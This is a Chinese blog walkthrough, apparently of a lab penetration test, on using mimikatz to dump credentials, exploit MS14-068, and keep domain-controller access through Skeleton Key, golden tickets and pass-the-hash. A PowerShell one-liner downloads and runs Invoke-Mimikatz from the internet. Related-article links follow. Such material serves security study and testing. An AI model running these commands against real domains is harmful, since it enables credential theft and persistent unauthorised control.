内网渗透中mimikatz的使用
0x01 简介
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
0x02 测试环境
网络资源管理模式:
域
已有资源:
域内一台主机权限
操作系统:win7 x64
域权限:普通用户
0x03 测试目标
1、获得域控权限 2、导出所有用户口令 3、维持域控权限
0x04 测试过程
1、获取本机信息
mimikatz:
privilege::debug
sekurlsa::logonpasswords
- 1
- 2
- 3
- 4
获取本机用户名、口令、sid、LM hash、NTLM hash 如图
2、攻击域控,获得权限
使用ms14-068漏洞
ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
导入伪造缓存: mimikatz:
kerberos::ptc test.ccache
登陆:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
- 1
- 2
- 3
- 4
- 5
3、导出域(1)直接获取内存口令 mimikatz:
privilege::debug
sekurlsa::logonpasswords
(2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
(3)通过powershell加载mimikatz获取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
(4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv持域控权限
(1)Skeleton Key mimikatz:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
- 1
- 2
- 3
- 4
- 5
4、维持域控权限
(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
- 1
- 2
- 3
- 4
- 5
(2)golden ticket mimikatz:
lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
生成万能票据: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:
kerberos::ptt test.kirbi
登陆域控:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
Tips:
Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a
5、补充
登陆域控,刷新扫雷记录,留下名字;D mimikatz:
minesweeper::infos
如图
内网渗透中mimikatz的使用的更多相关文章
- 内网渗透中的mimikatz
0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具--mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么 ...
- 内网渗透中的反弹Shell与端口转发
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...
- 内网渗透中SSh的巧用
后续应该会做个实例 转自:http://www.myhack58.com/Article/html/3/8/2009/25156.htm 经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控 ...
- 内网渗透----使用mimikatz获取windows登陆口令
使用mimikatz提取windows密码 以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privi ...
- 内网渗透中的NTLM-Hash Relay
基础知识 NTLN和Net-NTLM 1.NTLM(V1/V2)的hash是存放在安全账户管理(SAM)数据库以及域控的NTDS.dit数据库中,获取该Hash值可以直接进行PtH攻击,我博客中前文也 ...
- MSF 内网渗透笔记
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControl ...
- 7.内网渗透之windows认证机制
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...
- 5.内网渗透之PTH&PTT&PTK
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...
- 内网渗透 - 提权 - Windows
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...
随机推荐
- 【reverse】逆向6 JCC
[reverse]逆向6 JCC 前言 我们之前学习的时候讲了,eip寄存器存储的是当前(即将执行的语句的) 指向地址 而我们之前提到的下断点(F2),就和我们编程中的下断点一样,执行到某句汇编指令然 ...
- 推荐召回--基于用户的协同过滤UserCF
目录 1. 前言 2. 原理 3. 数据及相似度计算 4. 根据相似度计算结果 5. 相关问题 5.1 如何提炼用户日志数据? 5.2 用户相似度计算很耗时,有什么好的方法? 5.3 有哪些改进措施? ...
- 字的研究(2)Fonttools-字体文件的解析
前言 本文主要介绍如果使用Python第三方库fontTools对TrueType字体文件(指使用TrueType描述轮廓的OpenType字体文件)的解析.修改和创建等操作. fontTools简介 ...
- linux设置定时任务(全面解析教程)
目录 一:系统定时任务 二:系统定时任务配置文件(crontab) 三:增加定时任务 1.crontab -e 2.1.sh 3.2.txt 四:查看crontab定时任务 五:定时任务配置文件(ro ...
- linux挂载windows nfs
1.win下创建nfs文件夹并共享 2.登陆linux,执行 yum 3.创建挂载点 4.挂载win nfs 5./etc/fstab添加永久挂载 6.查看挂载磁盘,此时windows盘已落在linu ...
- AT2400 [ARC072B] Alice&Brown
通过打表后可以发现,当初始石头数 \(|X - Y| \le 1\) 时先手必败否则先手必胜. 我们考虑使用归纳证明这个结论,显然 \((1, 0), (1, 1)\) 时是成立的. 基于观察,我们可 ...
- CF Round #669 Div2
A 可以发现不论往怎样一个串往后加上两个 \(0\) 或两个 \(1\) 其奇数位和偶数位上的差值都是相同的.因此我们两位两位考虑这个 \(01\) 串,对于相邻两位相同那么直接留下,否则留下 \(0 ...
- Spring系列13:bean的生命周期
本文内容 bean的完整的生命周期 生命周期回调接口 Aware接口详解 Spring Bean的生命周期 面试热题:请描述下Spring的生命周期? 4大生命周期 从源码角度来说,简单分为4大阶段: ...
- HTC组件介绍及应用 HTML
转载请注明来源:https://www.cnblogs.com/hookjc/ HTML组件封装了HTML内容,并可以插入到别的HTML文档中.在HTML组件出现以前,在HMTL文档中使用自定义控制唯 ...
- 简单实现支付密码输入框 By HL
密码输入框在微信,支付宝中比较常见 主要功能点 1.6位(或者N位)密码输入框封装